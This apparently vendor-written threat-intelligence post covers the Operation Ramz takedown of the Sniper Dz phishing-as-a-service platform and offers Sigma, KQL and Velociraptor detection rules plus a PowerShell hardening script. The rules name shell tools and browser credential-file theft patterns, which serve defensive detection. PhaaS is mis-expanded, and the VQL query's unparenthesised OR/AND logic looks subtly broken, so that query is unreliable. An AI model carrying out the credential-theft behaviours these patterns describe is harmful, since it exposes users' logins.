Operation Ramz: Disrupting Sniper Dz PhaaS and Detecting Credential Harvesting

Introduction

Between October 2025 and February 2026, INTERPOL's Operation Ramz struck a significant blow against the cybercriminal ecosystem with the takedown of "Sniper Dz," a prolific Social Engineering-as-a-Service (PhaaS) platform active for over a decade. This coordinated effort across 13 MENA countries resulted in 201 arrests, including the platform's primary administrator, known as Guedz.

For defenders, the dismantling of Sniper Dz is a critical win. PhaaS platforms lower the barrier to entry for threat actors, providing novice criminals with sophisticated phishing kits, hosting infrastructure, and automation tools. While the infrastructure is down, the techniques and TTPs (Tactics, Techniques, and Procedures) popularized by Sniper Dz remain prevalent in the wild. SOC teams must remain vigilant against credential harvesting and social engineering campaigns that leverage similar PhaaS tooling.

Technical Analysis

Threat Overview: Sniper Dz operated as a subscription-based service, offering users a dashboard to launch customized phishing attacks. Like modern PhaaS platforms (e.g., Darcula, Legion), it likely provided:

Phishing Kits: Pre-built templates mimicking major financial institutions and email services.
Automation: Tools for mass email distribution and link rotation to bypass URL scanners.
Credential Harvesting: Mechanisms to capture and exfiltrate user credentials and 2FA tokens in real-time.

The Attack Chain (PhaaS Model):

Initial Access: Targeted users receive a phishing email (often bypassing standard gateways via novel obfuscation).
Execution: User clicks a link leading to a credential harvesting page (often hosted on compromised legitimate domains).
Collection: Entered credentials are captured by the PhaaS backend.
Exploitation: Actors use stolen credentials for initial access to corporate networks, lateral movement, or data exfiltration.

Affected Assets: While this is a service takedown rather than a software vulnerability, the "affected" assets are the user credentials and identity infrastructure (Okta, Azure AD, M365) targeted by these campaigns. There are no CVEs associated with this specific news item; the risk lies in the effectiveness of the social engineering methodology.

Detection & Response

Detecting PhaaS campaigns requires a shift from static signature matching to behavioral analysis. We focus on detecting the execution chain initiated by phishing payloads and the subsequent credential harvesting activity.

Sigma Rules

The following rules detect suspicious process spawning patterns often associated with phishing document detonation and the execution of harvesting tools.

YAML

---
title: Suspicious Child Process of Email Client
id: a8b9c0d1-2e3f-4a5b-6c7d-8e9f0a1b2c3d
status: experimental
description: Detects suspicious processes spawned by email clients, a common indicator of malicious document execution or phishing link activation.
references:
  - https://attack.mitre.org/techniques/T1566/
author: Security Arsenal
date: 2026/06/15
tags:
  - attack.initial_access
  - attack.t1566
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\outlook.exe'
      - '\thunderbird.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\mshta.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate automation scripts run by IT staff
level: high
---
title: PowerShell Suspicious Base64 Encoded Command
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects PowerShell commands with encoded arguments, frequently used in PhaaS kits to obfuscate downloading and executing second-stage payloads.
references:
  - https://attack.mitre.org/techniques/T1059/001/
author: Security Arsenal
date: 2026/06/15
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains: ' -e '
    CommandLine|re: '^.*[A-Za-z0-9+/=]{50,}.*$'
  condition: selection
falsepositives:
  - Admin script encoding
level: medium

KQL (Microsoft Sentinel / Defender)

This query hunts for instances where an Office application is spawning a shell process, a strong indicator of a macro-enabled document or exploit common in PhaaS distribution.

KQL — Microsoft Sentinel / Defender

let OfficeApps = dynamic(["WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE"]);
let ShellProcesses = dynamic(["POWERSHELL.EXE", "CMD.EXE", "MSHTA.EXE", "CSCRIPT.EXE", "WSCRIPT.EXE"]);
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ OfficeApps
| where FileName in~ ShellProcesses
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine, FolderPath
| order by Timestamp desc

Velociraptor VQL

This artifact hunts for suspicious browser extensions or processes attempting to access credential storage, often the payload delivered after a successful PhaaS hook.

VQL — Velociraptor

-- Hunt for suspicious processes accessing browser credential databases
SELECT Pid, Name, CommandLine, Username
FROM pslist()
WHERE Name =~ 'powershell.exe'
   OR Name =~ 'cmd.exe'
   AND CommandLine =~ 'Copy-Item|Compress-Archive|Select-String'
   AND CommandLine =~ 'Login Data|Cookies|History'
-- Also check for unexpected child processes of browsers
SELECT Parent.Pid AS ParentPid, Parent.Name AS ParentName, Child.Pid, Child.Name, Child.CommandLine
FROM chain()
WHERE Parent.Name =~ 'chrome.exe'
   AND Child.Name !~ 'chrome.exe'
   AND Child.Name !~ 'software_reporter_tool.exe'

Remediation Script (PowerShell)

This script implements Attack Surface Reduction (ASR) rules to mitigate the impact of PhaaS campaigns by blocking Office applications from creating child processes and preventing PowerShell execution from Office.

PowerShell

# Configure ASR Rules to mitigate PhaaS delivery mechanisms
# Requires Windows Defender ATP/Defender for Endpoint

# Rule ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
# Block Office applications from creating child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

# Rule ID: 3B576869-A4EC-4529-8536-B80A7769E899
# Block Win32 API calls from Office macro code
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled

# Verify configuration
Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions

Remediation

While Operation Ramz has disrupted the specific Sniper Dz infrastructure, the threat of PhaaS persists. Implement the following defensive measures immediately:

Enable Strict Phishing Filters: Configure email secure gateways (Proofpoint, Mimecast, Microsoft Defender for Office 365) to impersonation-safe settings and enable URL detonation for all links.
Disable Macro Execution: Set Group Policy to "Disable macros from the Internet" to prevent the primary vector of PhaaS malware delivery.
Deploy FIDO2/WebAuthn: Move beyond TOTP/SMS MFA. PhaaS platforms increasingly employ real-time MitM (Adversary-in-the-Middle) techniques (e.g., Evilginx2) to bypass 2FA. FIDO2 hardware keys (YubiKeys) are resistant to these attacks.
User Education: Conduct immediate awareness training referencing the Sniper Dz takedown as a real-world example of professionalized social engineering.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub